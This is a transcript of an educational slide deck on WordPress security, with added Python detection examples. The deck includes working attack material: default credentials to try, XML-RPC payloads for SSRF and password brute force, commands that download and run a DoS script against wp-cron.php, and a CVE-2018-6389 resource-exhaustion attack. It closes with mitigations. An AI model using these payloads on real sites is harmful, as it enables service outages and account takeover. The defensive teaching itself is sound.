
Wordpress Security

Tuhin Bose
December 03, 2021


Transcript

  1. Wordpress Security By Tuhin Bose

  2. Who am I?

  3. AGENDA: What is Wordpress? Why Wordpress? Hacking Wordpress. Security Measures. Conclusion & Q&A.
  4. What is Wordpress?

  5. Free and open source CMS. Used to create a beautiful website. Written in PHP and paired with a MySQL or MariaDB database. Simple, flexible, user management, easy to set up and upgrade.
  6. Why Wordpress?

  7. As of 2021, there are about 1.3 billion total websites on the web.
     1. More than 455 million sites use WordPress.
     2. Bunch of themes and plugins.
     3. Lack of awareness.
     4. Vulnerable by default.
  8. Hacking Wordpress

  9. Detection: Wappalyzer

  10. Default Credentials. User Permissions:
     1. Administrator
     2. Editor: publishes and manages his own and others' posts.
     3. Author: publishes and manages his own posts.
     4. Contributor: writes and manages his posts but cannot publish them.
     5. Subscriber: browses posts and edits their profile.
  11. Default Credentials. Login page: /wp-login.php. Try default credentials: admin:admin, admin:password, guest:guest ...
  12. xmlrpc.php. Location: /xmlrpc.php. XML-RPC is a feature of WordPress that enables data to be transmitted, with HTTP acting as the transport mechanism and XML as the encoding mechanism. Let's say you want to post to your website from your mobile device. You could use the remote access feature enabled by xmlrpc.php to do just that. We'll try to achieve SSRF and brute force.
  13. xmlrpc.php. List methods:

    <methodCall>
      <methodName>system.listMethods</methodName>
      <params></params>
    </methodCall>

    We're interested in pingback.ping & wp.getUsersBlogs.
  14. xmlrpc.php. SSRF using pingback.ping:

    <methodCall>
      <methodName>pingback.ping</methodName>
      <params>
        <param><value><string>http://xyz.burp.net:80</string></value></param>
        <param><value><string>http://target.com/</string></value></param>
      </params>
    </methodCall>
  15. xmlrpc.php. Brute Force using wp.getUsersBlogs:

    <methodCall>
      <methodName>wp.getUsersBlogs</methodName>
      <params>
        <param><value>admin</value></param>
        <param><value>pass</value></param>
      </params>
    </methodCall>
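An added detection example (not part of the deck) that parses the two XML-RPC payloads above the way a WAF or log pipeline on the defending side would, in Python; the labels, the private-address check and the five-attempt threshold are choices of this example, not from the slides:

```python
# Added example (not from the slides): classify XML-RPC request bodies sent to
# /xmlrpc.php so a WAF or log pipeline can flag the two methods the deck discusses.
import ipaddress
import xml.etree.ElementTree as ET
from collections import Counter
from urllib.parse import urlparse


def parse_method_call(body: str):
    """Return (methodName, [param strings]) from an XML-RPC <methodCall> body."""
    root = ET.fromstring(body)
    if root.tag != "methodCall":
        raise ValueError("not an XML-RPC methodCall")
    name = root.findtext("methodName", default="").strip()
    # <value>admin</value> and <value><string>...</string></value> both collapse to text.
    params = ["".join(v.itertext()).strip() for v in root.findall("./params/param/value")]
    return name, params


def classify(body: str) -> str:
    """Label one request. WordPress itself fetches the pingback source URL (first
    param), and wp.getUsersBlogs checks a username/password without the login form."""
    name, params = parse_method_call(body)
    if name == "pingback.ping" and params:
        host = urlparse(params[0]).hostname or ""
        try:
            if not ipaddress.ip_address(host).is_global:
                return "pingback-internal-target"  # fetch aimed at loopback/private space
        except ValueError:
            pass  # a hostname rather than a literal IP address
        return "pingback-fetch"
    if name == "wp.getUsersBlogs":
        return "credential-check"
    return "other"


def brute_force_sources(events, threshold=5):
    """events: iterable of (client_ip, body). Return IPs with >= threshold credential checks."""
    counts = Counter(ip for ip, body in events if classify(body) == "credential-check")
    return sorted(ip for ip, n in counts.items() if n >= threshold)


# Constructed sample bodies, taken from the two payloads shown on the slides.
PINGBACK = ("<methodCall><methodName>pingback.ping</methodName><params>"
            "<param><value><string>http://xyz.burp.net:80</string></value></param>"
            "<param><value><string>http://target.com/</string></value></param>"
            "</params></methodCall>")
LOGIN = ("<methodCall><methodName>wp.getUsersBlogs</methodName><params>"
         "<param><value>admin</value></param><param><value>pass</value></param>"
         "</params></methodCall>")
```

Feeding `brute_force_sources` a window of (client IP, body) pairs from your request logs turns the single credential check on the slide into a rate-based alert.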
  16. Denial of Service (DoS): /wp-cron.php. When this file is accessed, a heavy MySQL query is performed, so it could be used by attackers to cause a DoS. By default, wp-cron.php is called on every page load (any time a client requests any WordPress page), which on high-traffic sites can cause problems (DoS).
  17. Denial of Service (DoS): /wp-cron.php. Detection: blank page with 200 OK response. Exploitation: open your terminal and enter the following commands:
    i. wget https://raw.githubusercontent.com/Quitten/doser.py/master/doser.py
    ii. python3 doser.py -t 999 -g 'https://target.com/wp-cron.php'
  19. Denial of Service (DoS): CVE-2018-6389. WordPress allows users to load multiple JS files and CSS files through load-scripts.php at once. For example, for https://example.com/wp-admin/load-scripts.php?c=1&load%5B%5D=jquery-ui-core,editor&ver=4.9.1, load-scripts.php will load the jquery-ui-core and editor files automatically and return the contents of the files. However, the number and size of files are not restricted in the process of loading JS files, so attackers can use this function to deplete server resources and launch denial of service attacks. For example, if you use the below payload then it'll cause 4.11 Mb of data to be transferred between the server and the user. So if the attacker sends 10,000 requests then it would result in transferring 41100 Mb (42Gb) from the server to the user, which would cause a Denial of Service attack on the server.
  20. Denial of Service (DoS) Payload: https://pastebin.com/hATmX1pk Exploitation: Use doser.py
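An added example (not from the deck) that finds the CVE-2018-6389 request pattern described above in web-server access logs, in Python; the combined log format, the 20-handle and 3-hit thresholds and the sample lines are assumptions of this example, not from the slides:

```python
# Added example (not from the slides): flag access-log requests to wp-admin/load-scripts.php
# that ask for an abnormally long load[] list, the pattern behind CVE-2018-6389.
import re
from collections import defaultdict
from urllib.parse import parse_qs, urlsplit

# Assumes the common/combined web-server log format: client IP first, request line in quotes.
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3})')


def load_handles(path: str):
    """Return the script handles requested via load[] (sent URL-encoded as load%5B%5D),
    or None when the path is not load-scripts.php at all."""
    parts = urlsplit(path)
    if not parts.path.endswith("/load-scripts.php"):
        return None
    handles = []
    for value in parse_qs(parts.query).get("load[]", []):
        handles.extend(h for h in value.split(",") if h)
    return handles


def suspicious_requests(log_lines, max_handles=20):
    """Yield (ip, handle_count) for load-scripts.php hits requesting more than max_handles scripts."""
    for line in log_lines:
        m = LOG_RE.match(line)
        if m is None:
            continue
        handles = load_handles(m.group("path"))
        if handles is not None and len(handles) > max_handles:
            yield m.group("ip"), len(handles)


def offenders(log_lines, max_handles=20, min_hits=3):
    """Count suspicious hits per client IP (a flood repeats them) and return IPs at or above min_hits."""
    hits = defaultdict(int)
    for ip, _ in suspicious_requests(log_lines, max_handles):
        hits[ip] += 1
    return {ip: n for ip, n in hits.items() if n >= min_hits}


# Constructed sample log lines: one ordinary admin page load, three oversized requests, one non-log line.
NORMAL = ('203.0.113.5 - - [03/Dec/2021:10:00:01 +0000] "GET /wp-admin/load-scripts.php'
          '?c=1&load%5B%5D=jquery-ui-core,editor&ver=4.9.1 HTTP/1.1" 200 4096')
FLOOD = ('198.51.100.7 - - [03/Dec/2021:10:00:02 +0000] "GET /wp-admin/load-scripts.php?c=1&load%5B%5D='
         + ",".join(f"handle{i}" for i in range(60)) + '&ver=4.9.1 HTTP/1.1" 200 4200000')
SAMPLE_LOG = [NORMAL, FLOOD, FLOOD, FLOOD, "not a log line"]
```

A normal wp-admin page requests a handful of handles, so the handle count alone separates the slide's payload from legitimate traffic even before the per-IP count kicks in.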

  21. Automation: WPScan/CMSmap. CMSmap: CMSmap is a Python open source CMS scanner that automates the process of detecting security flaws in the most popular CMSs. The main purpose of this tool is to integrate common vulnerabilities for different types of CMSs into a single tool. cmsmap https://example.com
  22. Automation: WPScan/CMSmap. WPScan: WPScan is a WordPress security scanner written for security professionals and blog maintainers to test the security of their WordPress websites.
  23. Automation WPScan - Getting API Token

  24. Automation.
    Basic Scan: wpscan --url https://target.com/
    Detect All Themes: wpscan --url https://target.com/ -e at
    Detect All Plugins: wpscan --url https://target.com/ -e ap
    Detect Vulnerable Themes: wpscan --url https://target.com/ -e vt --api-token <API>
    Detect Vulnerable Plugins: wpscan --url https://target.com/ -e vp --api-token <API>
  25. Time for practical stuff

  26. Security Measures

  27. Security Measures
    1. Disable xmlrpc manually or using some plugin.
    2. Disable wp-cron by updating wp-config.php: define('DISABLE_WP_CRON', true); and configure a regular system cronjob.
    3. Protect from CVE-2018-6389 by modifying .htaccess:
       <Files load-scripts.php>
         Order allow,deny
         Deny from all
       </Files>
    4. Update WordPress core, themes and plugins from time to time.
    5. Hide the default login page / allow it only from a few IP addresses.
    6. Use reCAPTCHA on sensitive actions.
    7. Always take a backup of your site.
    8. Use a strong password and enable 2FA on every account.
  28. Twitter: @tuhin1729_ | Medium: @tuhin1729 | Instagram: @tuhin1729. Thank You!